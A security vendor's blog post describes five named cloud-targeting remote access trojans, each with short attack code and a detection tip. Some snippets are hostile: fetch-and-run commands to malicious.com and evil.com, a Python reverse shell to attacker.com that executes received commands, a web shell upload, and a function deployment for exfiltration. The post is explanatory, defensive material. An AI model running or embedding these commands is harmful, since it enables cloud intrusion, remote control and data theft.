Cloud infrastructure has become the backbone of modern businesses, but with great scalability comes greater attack surfaces. In 2025, attackers are increasingly targeting cloud environments using sophisticated Remote Access Trojans (RATs). These cloud-focused RATs aren’t just ported versions of traditional malware—they’re designed from the ground up to exploit cloud APIs, container orchestration systems, identity and access management (IAM), and ephemeral infrastructure.
In this blog, I’ll walk you through the five most dangerous cloud RATs I’ve come across this year. But before we get into the list, let’s take a moment to clarify what makes these RATs different from their mobile or traditional counterparts.
-Book Your FREE Cybersecurity Consultation Today!
Table of Contents
What Are Cloud-Focused Remote Access Trojans?
Unlike mobile or desktop RATs that typically rely on local persistence mechanisms, cloud-focused RATs are optimized to:
Exploit misconfigured IAM roles or API keys.
Spread laterally across multi-cloud setups.
Deploy and orchestrate containers or Lambda functions.
Remain persistent across stateless environments.
Here’s a basic concept of how a cloud RAT might initiate lateral movement in AWS:
import boto3
def assume_role(session_name, role_arn):
sts_client = boto3.client('sts')
assumed_role = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=session_name
)
return assumed_role['Credentials']
# Attacker's RAT assumes a role in another account
creds = assume_role("rat-session", "arn:aws:iam::123456789012:role/AdminRole")
Now, let’s dive into the top 5 RATs targeting the cloud in 2025.
1. NimbusStrike
Overview: NimbusStrike is tailor-made for AWS environments. It gains a foothold via leaked or phished API keys and pivots using the AWS CLI and Boto3.
Implementation Strategy:
Starts with basic key validation using
GetCallerIdentity.Enumerates services using
boto3.Deploys backdoored Lambda functions or EC2 user-data scripts.
Code Walkthrough:
# Backdoor an EC2 instance using user-data
import boto3
user_data_script = '''#!/bin/bash
curl -s http://malicious.com/payload.sh | bash
'''
ec2 = boto3.client('ec2')
ec2.run_instances(
ImageId='ami-xyz',
MinCount=1,
MaxCount=1,
UserData=user_data_script,
InstanceType='t2.micro'
)
Detection Tip: Look for unusual RunInstances events or modified user-data. AWS CloudTrail can help identify anomalies.
2. AzurePhantom
Overview: This RAT targets Microsoft Azure via the REST API. It abuses service principals and injects web shells into App Services.
Implementation Strategy:
Gains access using compromised client secrets.
Uses
az restand PowerShell to control cloud resources.Deploys Kudu-based web shells.
Code Walkthrough (Web Shell Deployment):
curl -X PUT -u ":$DEPLOYMENT_PASSWORD" \
-T shell.aspx \
https://<app-name>.scm.azurewebsites.net/wwwroot/shell.aspx
Detection Tip: Monitor Kudu SCM API access and look for non-developer IPs pushing content to /wwwroot.
3. CloudSpectre
Overview: CloudSpectre is a container-native RAT that integrates with Kubernetes clusters. It spreads via kubelets and misconfigured dashboards.
Implementation Strategy:
Deploys as a sidecar container.
Uses Kubernetes API to enumerate nodes and secrets.
Bypasses RBAC using stolen tokens.
Code Walkthrough (Pod Deployment):
apiVersion: v1
kind: Pod
metadata:
name: backdoor
spec:
containers:
- name: rat
image: attacker/reverse-shell:latest
command: ["/bin/sh", "-c", "curl http://evil.com/shell.sh | sh"]
Detection Tip: Audit your kube-apiserver logs and RBAC policy usage. Look for unapproved container images.
4. LambdaGhost
Overview: LambdaGhost specializes in ephemeral persistence by injecting itself into AWS Lambda layers. It rarely touches disk and evades most scanning tools.
Implementation Strategy:
Attaches malicious Lambda layers to existing functions.
Uses obfuscated Python/Node.js payloads.
Communicates over hidden CloudWatch logs.
Code Walkthrough (Python Layer Hijack):
# Sample RAT logic inside a Lambda layer
import socket
def backdoor():
s = socket.socket()
s.connect(('attacker.com', 4444))
while True:
cmd = s.recv(1024).decode()
exec(cmd)
Detection Tip: Track changes to Lambda layers. Monitor outbound connections from Lambda functions with VPC access.
5. GCPReaper
Overview: This RAT hits Google Cloud environments, especially Compute Engine and Cloud Functions. It abuses service accounts and IAM impersonation.
Implementation Strategy:
Impersonates service accounts using OAuth tokens.
Deploys Cloud Functions with malicious payloads.
Exfiltrates data via Google Sheets API.
Code Walkthrough (Function Deployment):
gcloud functions deploy exfil --runtime python39 \
--trigger-http --entry-point main \
--source=gs://evil-bucket/source.zip
Detection Tip: Enable logging for gcloud functions deploy and use Event Threat Detection to alert on abuse.
Conclusion
Cloud-focused RATs are a different beast altogether. They exploit the abstraction and automation of cloud services to hide, persist, and move laterally. Tools like NimbusStrike and AzurePhantom don’t need traditional persistence mechanisms they thrive in IAM misconfigurations and poorly monitored serverless functions.
If you’re in charge of cloud security, it’s not enough to secure your EC2 or S3. You need to:
Continuously rotate and audit your API keys.
Enforce least privilege policies on IAM.
Monitor all deployments via CI/CD pipelines.
Enable real-time alerting for cloud-native operations.
These threats are real, and they’re only growing more stealthy with each iteration. Hopefully, this guide gave you some practical insight into the landscape of cloud-based RATs in 2025.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!
Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts
Your Crypto Wallet Isn’t Safe -Even on iPhone. Here’s Why
Even iPhone users aren’t safe. A new malware named SparkKitty is using AI and gallery access to steal crypto wallet seed phrases silently from your phone.
Fortinet CVE-2023-42788: OS Command Injection Vulnerability
Fortinet’s CVE-2023-42788 affects multiple products, enabling OS command injection. Learn about the risks and key mitigation steps to protect your systems.
New Wireshark Vulnerability Triggers DoS Attack: What You Need to Know (CVE-2025-5601)
A high-severity DoS vulnerability in Wireshark (CVE-2025-5601) could crash the tool via malformed packets or malicious capture files. This flaw impacts millions and underscores the need for urgent patching and safe handling of .pcap files.
Steganography in Cybercrime: How Hackers Hide Malware in Plain Sight
Hackers are turning to an ancient technique, steganography to hide malware inside everyday files like images and audio. This blog explores how malicious code is concealed in plain sight, including a shocking WhatsApp scam where a man lost ₹2 lakh to a seemingly innocent image.
WhatsApp Image Scam: WhatsApp Images Could Be Cyber Traps!
Think twice before opening that WhatsApp image cybercriminals are now hiding malware inside photos using advanced techniques like steganography. In this blog, I break down how one victim lost ₹2 lakh from a single download, and how you can stay safe with simple, actionable steps.
Critical Zero-Day in FortiVoice Patched by Fortinet After Active Exploits
Fortinet has patched a critical zero-day vulnerability (CVE-2025-32756) exploited in active attacks targeting FortiVoice and other products like FortiMail and FortiCamera. The flaw allowed remote code execution via crafted HTTP requests, with attackers deploying malware and harvesting credentials before the fix was released.